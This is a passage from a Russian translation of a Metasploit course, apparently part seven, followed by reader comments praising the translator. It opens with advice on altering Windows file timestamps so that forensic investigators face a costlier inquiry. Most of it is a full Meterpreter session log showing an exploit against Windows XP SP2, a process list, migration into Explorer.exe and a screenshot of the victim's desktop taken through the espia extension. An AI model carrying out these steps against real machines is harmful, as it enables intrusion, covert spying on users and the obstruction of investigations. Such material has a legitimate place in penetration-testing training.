Однако, не будьте самонадеянными. Осуществив эти изменения, вы сделали очевидным факт того, что в системе были произведены явно не благоприятные действия. Кроме того существуют еще различные источники получения информации о системе Windows нежели информация полученная из MAC. Если судебный следователь наткнулся на систему, которая была изменена таким образом, он будет искать эти альтернативные источники информации. Тем не менее, расходы на проведение расследования уже будут выше.
Скриншот экрана.
Командой разработчиков Metasploit в последнем обновлении на основе Metasploit (3.3) было добавлено несколько весьма интересных нововведений. В предыдущих главах вы узнали о страшной силе Meterpreter. Еще одна добавленная возможность, это скриншот рабочего стола жертвы, с возможностью сохранения в вашей системе. Давайте кратко рассмотрим, как это работает. Мы уже предполагаем, что вы в Meterpreter консоли, взглянем на то, что отображено на экране жертвы.
[*] Started bind handler [*] Trying target Windows XP SP2 - English... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.1.101:34117 -> 192.168.1.104:4444) meterpreter > ps Process list ============ PID Name Path --- ---- ---- 180 notepad.exe C:\WINDOWS\system32\notepad.exe 248 snmp.exe C:\WINDOWS\System32\snmp.exe 260 Explorer.EXE C:\WINDOWS\Explorer.EXE 284 surgemail.exe c:\surgemail\surgemail.exe 332 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe 612 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 620 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 648 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe 664 GrooveMonitor.exe C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe 728 WZCSLDR2.exe C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe 736 jusched.exe C:\Program Files\Java\jre6\bin\jusched.exe 756 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe 816 smss.exe \SystemRoot\System32\smss.exe 832 alg.exe C:\WINDOWS\System32\alg.exe 904 csrss.exe \??\C:\WINDOWS\system32\csrss.exe 928 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe 972 services.exe C:\WINDOWS\system32\services.exe 984 lsass.exe C:\WINDOWS\system32\lsass.exe 1152 vmacthlp.exe C:\Program Files\VMware\VMware Tools\vmacthlp.exe 1164 svchost.exe C:\WINDOWS\system32\svchost.exe 1276 nwauth.exe c:\surgemail\nwauth.exe 1296 svchost.exe C:\WINDOWS\system32\svchost.exe 1404 svchost.exe C:\WINDOWS\System32\svchost.exe 1500 svchost.exe C:\WINDOWS\system32\svchost.exe 1652 svchost.exe C:\WINDOWS\system32\svchost.exe 1796 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe 1912 3proxy.exe C:\3proxy\bin\3proxy.exe 2024 jqs.exe C:\Program Files\Java\jre6\bin\jqs.exe 2188 swatch.exe c:\surgemail\swatch.exe 2444 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe 3004 cmd.exe C:\WINDOWS\system32\cmd.exe meterpreter > migrate 260 [*] Migrating to 260... [*] Migration completed successfully. meterpreter > use espia Loading extension espia...success. meterpreter > screenshot /tmp/moo.bmp [*] Image saved to /tmp/moo.bmp Opening browser to image...
Мы можем видеть насколько эффективно это работает, переключившись на explorer.exe. Так же убедитесь, что Meterpreter имеет активную сессию к удаленному ПК, иначе ничего не получится. После всех действий можно посмотреть на снимок рабочего стола удаленной системы.
На этом седьмую часть курса можно считать завершенной, до встречи в следующих частях.
Источник:
Перевод: Э_L_A_Y
Уже седьмая часть перевода курсов и ни одного комментария по качеству перевода и стоит ли переводить дальше :)Обращаюсь к тем кто все это читает, помимо меня, если есть исправления предлагайте, будем переводить вместе ;)
Отличные статьи (перевод), читаю запоем, не могу оторваться.
Зачет и медаль тому человеку, кто все это делает.
Отлично, благодарю за отзыв, буду продолжать переводить :)
Чувак респект тебе за твой статьи очень интересно мне понравилось очень продолжай в том же духе, я давно искал подобное большое спасибо.
Огромный РЕСПЕКТ автору !!!!!!!!!!
Перевод мануала отличный, ждём продолжения….